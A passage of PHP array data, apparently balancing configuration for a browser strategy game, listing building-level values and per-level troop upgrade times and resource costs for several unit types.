'resources' => array( '1' => 910, '2' => 1070, '3' => 2040, '4' => 700 )



'value' => 112, 'time_consume' => 6260, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 1170, '2' => 1370, '3' => 2610, '4' => 890 )



'value' => 114, 'time_consume' => 7570, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 1500, '2' => 1760, '3' => 3340, '4' => 1140 )



'value' => 116, 'time_consume' => 9080, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 1910, '2' => 2250, '3' => 4280, '4' => 1460 )



'value' => 118, 'time_consume' => 10830, 'cp' => 10, 'people_inc' => 3,

'resources' => array( '1' => 2450, '2' => 2880, '3' => 5480, '4' => 1870 )



'value' => 120, 'time_consume' => 12860, 'cp' => 12, 'people_inc' => 3,

'resources' => array( '1' => 3140, '2' => 3690, '3' => 7010, '4' => 2400 )



'value' => 122, 'time_consume' => 15220, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 4010, '2' => 4720, '3' => 8970, '4' => 3070 )



'value' => 124, 'time_consume' => 17950, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 5140, '2' => 6040, '3' => 11480, '4' => 3930 )



'value' => 126, 'time_consume' => 21130, 'cp' => 21, 'people_inc' => 3,

'resources' => array( '1' => 6580, '2' => 7740, '3' => 14700, '4' => 5030 )



'value' => 128, 'time_consume' => 24810, 'cp' => 26, 'people_inc' => 3,

'resources' => array( '1' => 8420, '2' => 9900, '3' => 18820, '4' => 6440 )



'value' => 130, 'time_consume' => 29080, 'cp' => 31, 'people_inc' => 3,

'resources' => array( '1' => 10780, '2' => 12680, '3' => 24090, '4' => 8240 )



'value' => 132, 'time_consume' => 34030, 'cp' => 37, 'people_inc' => 4,

'resources' => array( '1' => 13790, '2' => 16230, '3' => 30830, '4' => 10550 )



'value' => 134, 'time_consume' => 39770, 'cp' => 44, 'people_inc' => 4,

'resources' => array( '1' => 17650, '2' => 20770, '3' => 39460, '4' => 13500 )



'value' => 136, 'time_consume' => 46440, 'cp' => 53, 'people_inc' => 4,

'resources' => array( '1' => 22600, '2' => 26580, '3' => 50510, '4' => 17280 )



'value' => 138, 'time_consume' => 54170, 'cp' => 64, 'people_inc' => 4,

'resources' => array( '1' => 28920, '2' => 34030, '3' => 64650, '4' => 22120 )



'value' => 140, 'time_consume' => 63130, 'cp' => 77, 'people_inc' => 4,

'resources' => array( '1' => 37020, '2' => 43560, '3' => 82760, '4' => 28310 )




'13'=> array (

'troop_upgrades'=> array (

'1'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'2'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'3'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'4'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'5'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'6'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'7'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'8'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),


'11'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 765, '2' => 625, '3' => 480, '4' => 440)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1330, '2' => 1090, '3' => 835, '4' => 765)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1840, '2' => 1505, '3' => 1155, '4' => 1060)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2320, '2' => 1895, '3' => 1455, '4' => 1335)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2770, '2' => 2265, '3' => 1740, '4' => 1595)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3210, '2' => 2620, '3' => 2015, '4' => 1845)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3630, '2' => 2965, '3' => 2275, '4' => 2085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4040, '2' => 3300, '3' => 2535, '4' => 2320)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4435, '2' => 3625, '3' => 2785, '4' => 2550)),

array ('time_consume' => 74880, 'resources' => array( '1' => 4825, '2' => 3945, '3' => 3030, '4' => 2775)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5210, '2' => 4255, '3' => 3270, '4' => 2995)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5585, '2' => 4565, '3' => 3505, '4' => 3210)),

array ('time_consume' => 96480, 'resources' => array( '1' => 5955, '2' => 4865, '3' => 3735, '4' => 3425)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6320, '2' => 5160, '3' => 3965, '4' => 3635)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6675, '2' => 5455, '3' => 4190, '4' => 3840)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7030, '2' => 5745, '3' => 4410, '4' => 4045)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7380, '2' => 6030, '3' => 4630, '4' => 4245)),

array ('time_consume' => 132480, 'resources' => array( '1' => 7725, '2' => 6310, '3' => 4845, '4' => 4445)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8065, '2' => 6590, '3' => 5060, '4' => 4640)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8405, '2' => 6865, '3' => 5275, '4' => 4835)),


'12'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1115, '2' => 590, '3' => 795, '4' => 440)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1940, '2' => 1025, '3' => 1385, '4' => 765)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2685, '2' => 1420, '3' => 1915, '4' => 1060)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3380, '2' => 1790, '3' => 2410, '4' => 1335)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4040, '2' => 2140, '3' => 2880, '4' => 1595)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4675, '2' => 2475, '3' => 3335, '4' => 1845)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5290, '2' => 2800, '3' => 3770, '4' => 2085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5885, '2' => 3115, '3' => 4195, '4' => 2320)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6465, '2' => 3420, '3' => 4610, '4' => 2550)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7035, '2' => 3725, '3' => 5015, '4' => 2775)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7595, '2' => 4020, '3' => 5415, '4' => 2995)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8140, '2' => 4305, '3' => 5805, '4' => 3210)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8680, '2' => 4590, '3' => 6190, '4' => 3425)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9210, '2' => 4875, '3' => 6565, '4' => 3635)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9730, '2' => 5150, '3' => 6940, '4' => 3840)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10245, '2' => 5420, '3' => 7305, '4' => 4045)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10755, '2' => 5690, '3' => 7670, '4' => 4245)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11260, '2' => 5960, '3' => 8030, '4' => 4445)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11755, '2' => 6220, '3' => 8380, '4' => 4640)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12250, '2' => 6480, '3' => 8735, '4' => 4835)),


'13'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1010, '2' => 940, '3' => 1390, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1760, '2' => 1635, '3' => 2420, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2430, '2' => 2265, '3' => 3345, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3060, '2' => 2850, '3' => 4215, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3660, '2' => 3405, '3' => 5035, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4235, '2' => 3940, '3' => 5830, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4790, '2' => 4460, '3' => 6595, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5330, '2' => 4960, '3' => 7335, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5860, '2' => 5450, '3' => 8060, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6375, '2' => 5930, '3' => 8770, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6880, '2' => 6400, '3' => 9465, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7375, '2' => 6860, '3' => 10150, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7860, '2' => 7315, '3' => 10820, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8340, '2' => 7765, '3' => 11480, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8815, '2' => 8205, '3' => 12130, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9280, '2' => 8640, '3' => 12775, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9745, '2' => 9065, '3' => 13410, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10200, '2' => 9490, '3' => 14035, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10650, '2' => 9910, '3' => 14655, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11095, '2' => 10325, '3' => 15270, '4' => 7140)),


'14'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1220, '2' => 800, '3' => 550, '4' => 510)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2125, '2' => 1395, '3' => 960, '4' => 890)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2940, '2' => 1925, '3' => 1325, '4' => 1230)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3700, '2' => 2425, '3' => 1665, '4' => 1545)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4420, '2' => 2900, '3' => 1995, '4' => 1850)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5115, '2' => 3355, '3' => 2305, '4' => 2140)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5785, '2' => 3795, '3' => 2610, '4' => 2420)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6440, '2' => 4220, '3' => 2905, '4' => 2690)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7075, '2' => 4640, '3' => 3190, '4' => 2960)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7700, '2' => 5050, '3' => 3470, '4' => 3220)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8310, '2' => 5450, '3' => 3745, '4' => 3475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8905, '2' => 5840, '3' => 4015, '4' => 3725)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9495, '2' => 6225, '3' => 4280, '4' => 3970)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10075, '2' => 6605, '3' => 4540, '4' => 4210)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10645, '2' => 6980, '3' => 4800, '4' => 4450)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11210, '2' => 7350, '3' => 5055, '4' => 4685)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11770, '2' => 7715, '3' => 5305, '4' => 4920)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12320, '2' => 8080, '3' => 5555, '4' => 5150)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12865, '2' => 8435, '3' => 5800, '4' => 5375)),

array ('time_consume' => 146880, 'resources' => array( '1' => 13400, '2' => 8790, '3' => 6040, '4' => 5605)),


'15'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1345, '2' => 995, '3' => 1115, '4' => 345)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2340, '2' => 1730, '3' => 1940, '4' => 595)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3240, '2' => 2395, '3' => 2685, '4' => 825)),

array ('time_consume' => 31680, 'resources' => array( '1' => 4075, '2' => 3015, '3' => 3380, '4' => 1040)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4875, '2' => 3605, '3' => 4040, '4' => 1240)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5640, '2' => 4170, '3' => 4675, '4' => 1435)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6380, '2' => 4720, '3' => 5290, '4' => 1625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 7100, '2' => 5250, '3' => 5885, '4' => 1810)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7800, '2' => 5770, '3' => 6465, '4' => 1985)),

